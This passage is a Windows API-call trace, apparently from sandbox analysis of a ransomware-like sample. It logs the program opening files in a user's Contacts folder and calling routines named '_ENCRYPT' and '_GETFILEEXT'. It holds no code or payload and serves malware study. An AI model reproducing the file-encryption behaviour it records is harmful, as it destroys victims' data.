(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0029.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.454] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0029.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889a60 [0029.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889a60, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0029.454] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0029.455] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.455] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.455] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.455] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.455] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896b8 [0029.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8896b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0029.456] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.456] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.456] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0029.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0029.456] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.456] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.456] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.456] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0029.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.456] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.456] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.456] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.456] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x777648, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 0x7c20c0 [0029.457] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.457] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.457] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x777648, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 0x7c20c0 [0029.457] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.457] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.457] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.457] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.457] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.457] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.457] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.457] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.458] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.458] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.458] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.459] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.459] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.459] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.459] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x777648, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 0x7c20c0 [0029.459] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.459] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x777648, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 0x7c20c0 [0029.459] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.462] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.462] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.462] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.462] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.462] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.462] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.462] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.462] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.462] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.462] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.463] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0029.463] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.463] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0029.463] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.463] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.463] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.463] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.463] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.464] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.464] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.464] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.464] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.464] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.464] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.465] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x777648, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 0x7c20c0 [0029.465] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.465] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x777648, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 0x7c20c0 [0029.465] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.465] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.465] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.465] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.465] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.466] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.466] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.466] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.466] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.466] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.466] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", 